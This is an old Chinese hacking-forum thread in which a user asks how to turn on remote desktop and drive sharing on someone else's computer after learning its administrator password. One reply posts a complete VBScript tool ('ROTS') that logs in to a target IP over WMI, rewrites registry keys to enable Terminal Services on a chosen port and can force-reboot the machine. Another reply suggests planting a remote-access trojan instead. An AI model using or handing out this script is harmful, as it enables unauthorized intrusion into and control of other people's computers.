论坛: 菜鸟乐园 标题: 如何开起远程桌面连接 复制本贴地址    
作者: xtlyygy [xtlyygy]    论坛用户   登录
如果知道了对方的administrator密码,要怎样开起它的的远程桌面连接.
还有他的C、D、盘没共享,要如何使它共享?

地主 发表时间: 03/26 16:26
回复: vrssili [vrssili]   论坛用户   登录
看看他有没有3389要是有的话那就简单了直接进就得了

B1层 发表时间: 03/26 17:41
回复: xtlyygy [xtlyygy]   论坛用户   登录
那要如何开他的3389端口呢?

B2层 发表时间: 03/27 10:18
回复: bking [bking]   版主   登录
开起3389的软件多的是,

B3层 发表时间: 03/27 11:35
回复: xtlyygy [xtlyygy]   论坛用户   登录
我是问能否启动的它的服务,让他开3389端口呢?

B4层 发表时间: 03/27 11:48
回复: helpme [helpme]   论坛用户   登录
以下是开终端的脚本,把它存为*.vbe 远程运行
on error resume next 
set outstreem=wscript.stdout 
set instreem=wscript.stdin 
if (lcase(right(wscript.fullname,11))="wscript.exe") then 
   set objShell=wscript.createObject("wscript.shell") 
   objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) 
   wscript.quit 
end if 
if wscript.arguments.count<3 then 
   usage() 
   wscript.echo "Not enough parameters." 
   wscript.quit 
end if 

ipaddress=wscript.arguments(0) 
username=wscript.arguments(1) 
password=wscript.arguments(2) 
if wscript.arguments.count>3 then 
   port=wscript.arguments(3) 
else 
   port=3389 
end if 
if not isnumeric(port) or port<1 or port>65000 then 
   wscript.echo "The number of port is error." 
   wscript.quit 
end if 
if wscript.arguments.count>4 then 
   reboot=wscript.arguments(4) 
else 
   reboot="" 
end if 

usage() 
outstreem.write "Conneting "&ipaddress&" ...." 
set objlocator=createobject("wbemscripting.swbemlocator") 
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password) 
showerror(err.number) 
objswbemservices.security_.privileges.add 23,true 
objswbemservices.security_.privileges.add 18,true 

outstreem.write "Checking OS type...." 
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem") 
for each objinstoscaption in colinstoscaption 
   if instr(objinstoscaption.caption,"Server")>0 then 
      wscript.echo "OK!" 
   else 
      wscript.echo "OS type is "&objinstoscaption.caption 
      outstreem.write "Do you want to cancel setup?[y/n]" 
      strcancel=instreem.readline 
      if lcase(strcancel)<>"n" then wscript.quit 
   end if 
next 

outstreem.write "Writing into registry ...." 
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov") 
HKLM=&h80000002 
HKU=&h80000003 
with objinstreg 
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" 
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0 
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" 
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1 
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2 
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2 
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1" 
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port 
end with 
showerror(err.number) 

rebt=lcase(reboot) 
flag=0 
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2 
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6 
if flag<>0 then 
   outstreem.write "Now, reboot target...." 
   strwqlquery="select * from win32_operatingsystem where primary='true'" 
   set colinstances=objswbemservices.execquery(strwqlquery) 
   for each objinstance in colinstances 
      objinstance.win32shutdown(flag) 
   next 
   showerror(err.number) 
else 
   wscript.echo "You need to reboot target."&vbcrlf&"Then," 
end if 
wscript.echo "You can logon terminal services on "&port&" later. Good luck!" 

function showerror(errornumber) 
if errornumber Then 
   wscript.echo "Error 0x"&cstr(hex(err.number))&" ." 
   if err.description <> "" then 
      wscript.echo "Error description: "&err.description&"." 
   end if 
   wscript.quit 
else 
   wscript.echo "OK!" 
end if 
end function 

function usage() 
wscript.echo string(79,"*") 
wscript.echo "ROTS v1.05" 
wscript.echo "Remote Open Terminal services Script, by 草哲" 
wscript.echo "Welcome to visite www.5458.net 
wscript.echo "Usage:" 
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]" 
wscript.echo "port: default number is 3389." 
wscript.echo "/r: auto reboot target." 
wscript.echo "/fr: auto force reboot target." 
wscript.echo string(79,"*")&vbcrlf 
end function 

B5层 发表时间: 03/27 13:06
回复: xtlyygy [xtlyygy]   论坛用户   登录
试过了,可以好像不管用.但不知道是不是计划没有执行,因为时间都过了,可是还是显示计划正在运行,不知道是怎么回事.

B6层 发表时间: 03/27 16:24
回复: vishx [vishx]   论坛用户   登录
传个木马去,就能看到桌面了,但没3389看起来爽

B7层 发表时间: 03/27 16:33
回复: xtlyygy [xtlyygy]   论坛用户   登录
可是,有个问题我要说明:我的电脑上不能使用冰河、广外女生等东西。
前两天系统重装过了也不行。所以只能利用3389登入。

B8层 发表时间: 03/27 16:47

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号